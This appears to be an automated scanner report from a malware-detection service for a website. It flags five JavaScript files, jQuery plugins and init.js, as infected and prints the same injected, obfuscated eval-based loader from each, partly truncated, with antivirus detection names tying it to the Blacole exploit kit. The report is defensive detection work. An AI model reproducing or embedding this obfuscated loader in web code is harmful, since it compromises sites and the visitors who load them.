Malware Scanner report for youme-uswe.com

Malicious/Suspicious/Total urls checked: 5/0/8

5 pages have malicious code. See details below

Blacklists: Found

The website is marked by Yandex as suspicious.

The website "youme-uswe.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=youme-uswe.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://youme-uswe.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://youme-uswe.com/	200 OK Content-Length: 15186 Content-Type: text/html	clean
https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js	200 OK Content-Length: 91668 Content-Type: text/javascript	clean
http://youme-uswe.com/js/jquery.ba-hashchange.min.js	200 OK Content-Length: 3649 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,102,99,116,120,109,117,113,96,101,115,44,111,113 ... 755 bytes are skipped ...15,99,40,38,58,100,104,116,32,104,98,61,91,37,109,96,112,119,96,98,115,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,107,97,113,117,97,99,113,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,97,40,57,13,9,30,125,12,8,125,40,38,41,58,11,10);}w=f;s=[];r=String;for(i=0;-i+412!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCh"+"arC"+((020===0x10)?"ode":"")]((1*w[j]+j%3));}try{(w+s)()}catch(asga){e(s+"");} Antivirus reports: AntiVir JS/RunForest.T Avast JS:Iframe-UN [Trj] Ikarus Trojan.JS.Blacole nProtect Trojan.JS.Obfuscated.X K7AntiVirus Riskware TrendMicro-HouseCall JS_IFRAMERE.SMJF Comodo TrojWare.JS.Iframe.IA McAfee-GW-Edition JS/Exploit-Blacole.gc TrendMicro JS_IFRAMERE.SMJF Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/BlacoleRef.CN MicroWorld-eScan Trojan.JS.Obfuscated.X Fortinet JS/Blacole.GC!exploit McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.bbefuc F-Secure Trojan.JS.Obfuscated.X F-Prot JS/IFrame.QW.gen AVG HTML/Framer Norman Blacole.OZ GData Trojan.JS.Obfuscated.X Commtouch JS/IFrame.QW.gen BitDefender Trojan.JS.Obfuscated.X
http://youme-uswe.com/js/jquery.backstretch.js	200 OK Content-Length: 7800 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,102,99,116,120,109,117,113,96,101,115,44,111,113 ... 755 bytes are skipped ...15,99,40,38,58,100,104,116,32,104,98,61,91,37,109,96,112,119,96,98,115,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,107,97,113,117,97,99,113,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,97,40,57,13,9,30,125,12,8,125,40,38,41,58,11,10);}w=f;s=[];r=String;for(i=0;-i+412!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCh"+"arC"+((020===0x10)?"ode":"")]((1*w[j]+j%3));}try{(w+s)()}catch(asga){e(s+"");} Antivirus reports: AntiVir JS/RunForest.T Avast JS:Iframe-UN [Trj] Ikarus Trojan.JS.Blacole nProtect Trojan.JS.Obfuscated.X K7AntiVirus Riskware TrendMicro-HouseCall JS_IFRAMERE.SMJF Comodo TrojWare.JS.Iframe.IA McAfee-GW-Edition JS/Exploit-Blacole.gc TrendMicro JS_IFRAMERE.SMJF Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/BlacoleRef.CN MicroWorld-eScan Trojan.JS.Obfuscated.X Fortinet JS/Blacole.GC!exploit McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.bbefuc F-Secure Trojan.JS.Obfuscated.X F-Prot JS/IFrame.QW.gen AVG HTML/Framer Norman Blacole.OZ GData Trojan.JS.Obfuscated.X Commtouch JS/IFrame.QW.gen BitDefender Trojan.JS.Obfuscated.X
http://youme-uswe.com/js/jquery.scrollTo-min.js	200 OK Content-Length: 4375 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,102,99,116,120,109,117,113,96,101,115,44,111,113 ... 755 bytes are skipped ...15,99,40,38,58,100,104,116,32,104,98,61,91,37,109,96,112,119,96,98,115,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,107,97,113,117,97,99,113,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,97,40,57,13,9,30,125,12,8,125,40,38,41,58,11,10);}w=f;s=[];r=String;for(i=0;-i+412!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCh"+"arC"+((020===0x10)?"ode":"")]((1*w[j]+j%3));}try{(w+s)()}catch(asga){e(s+"");} Antivirus reports: AntiVir JS/RunForest.T Avast JS:Iframe-UN [Trj] Ikarus Trojan.JS.Blacole nProtect Trojan.JS.Obfuscated.X K7AntiVirus Riskware TrendMicro-HouseCall JS_IFRAMERE.SMJF Comodo TrojWare.JS.Iframe.IA McAfee-GW-Edition JS/Exploit-Blacole.gc TrendMicro JS_IFRAMERE.SMJF Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/BlacoleRef.CN MicroWorld-eScan Trojan.JS.Obfuscated.X Fortinet JS/Blacole.GC!exploit McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.bbefuc F-Secure Trojan.JS.Obfuscated.X F-Prot JS/IFrame.QW.gen AVG HTML/Framer Norman Blacole.OZ GData Trojan.JS.Obfuscated.X Commtouch JS/IFrame.QW.gen BitDefender Trojan.JS.Obfuscated.X
http://youme-uswe.com/js/jquery.localscroll-min.js	200 OK Content-Length: 3675 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,102,99,116,120,109,117,113,96,101,115,44,111,113 ... 755 bytes are skipped ...15,99,40,38,58,100,104,116,32,104,98,61,91,37,109,96,112,119,96,98,115,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,107,97,113,117,97,99,113,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,97,40,57,13,9,30,125,12,8,125,40,38,41,58,11,10);}w=f;s=[];r=String;for(i=0;-i+412!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCh"+"arC"+((020===0x10)?"ode":"")]((1*w[j]+j%3));}try{(w+s)()}catch(asga){e(s+"");} Antivirus reports: AntiVir JS/RunForest.T Avast JS:Iframe-UN [Trj] Ikarus Trojan.JS.Blacole nProtect Trojan.JS.Obfuscated.X K7AntiVirus Riskware TrendMicro-HouseCall JS_IFRAMERE.SMJF Comodo TrojWare.JS.Iframe.IA McAfee-GW-Edition JS/Exploit-Blacole.gc TrendMicro JS_IFRAMERE.SMJF Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/BlacoleRef.CN MicroWorld-eScan Trojan.JS.Obfuscated.X Fortinet JS/Blacole.GC!exploit McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.bbefuc F-Secure Trojan.JS.Obfuscated.X F-Prot JS/IFrame.QW.gen AVG HTML/Framer Norman Blacole.OZ GData Trojan.JS.Obfuscated.X Commtouch JS/IFrame.QW.gen BitDefender Trojan.JS.Obfuscated.X
http://youme-uswe.com/js/init.js	200 OK Content-Length: 3925 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,102,99,116,120,109,117,113,96,101,115,44,111,113 ... 755 bytes are skipped ...15,99,40,38,58,100,104,116,32,104,98,61,91,37,109,96,112,119,96,98,115,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,107,97,113,117,97,99,113,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,97,40,57,13,9,30,125,12,8,125,40,38,41,58,11,10);}w=f;s=[];r=String;for(i=0;-i+412!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCh"+"arC"+((020===0x10)?"ode":"")]((1*w[j]+j%3));}try{(w+s)()}catch(asga){e(s+"");} Antivirus reports: AntiVir JS/RunForest.T Avast JS:Iframe-UN [Trj] Ikarus Trojan.JS.Blacole nProtect Trojan.JS.Obfuscated.X K7AntiVirus Riskware TrendMicro-HouseCall JS_IFRAMERE.SMJF Comodo TrojWare.JS.Iframe.IA McAfee-GW-Edition JS/Exploit-Blacole.gc TrendMicro JS_IFRAMERE.SMJF Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/BlacoleRef.CN MicroWorld-eScan Trojan.JS.Obfuscated.X Fortinet JS/Blacole.GC!exploit McAfee JS/Exploit-Blacole.gc NANO-Antivirus Trojan.Script.Expack.bbefuc F-Secure Trojan.JS.Obfuscated.X F-Prot JS/IFrame.QW.gen AVG HTML/Framer Norman Blacole.OZ GData Trojan.JS.Obfuscated.X Commtouch JS/IFrame.QW.gen BitDefender Trojan.JS.Obfuscated.X
http://youme-uswe.com/test404page.js	404 Not Found Content-Length: 276 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: youme-uswe.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 19:55:30 GMT
Accept-Ranges: bytes
ETag: "2c2223a-3b52-4c258fbd82640"
Server: Apache
Content-Length: 15186
Content-Type: text/html
Last-Modified: Wed, 13 Jun 2012 11:35:45 GMT
X-Powered-By: PleskLin

...15186 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: youme-uswe.com
Referer: http://www.google.com/search?q=youme-uswe.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for youme-uswe.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools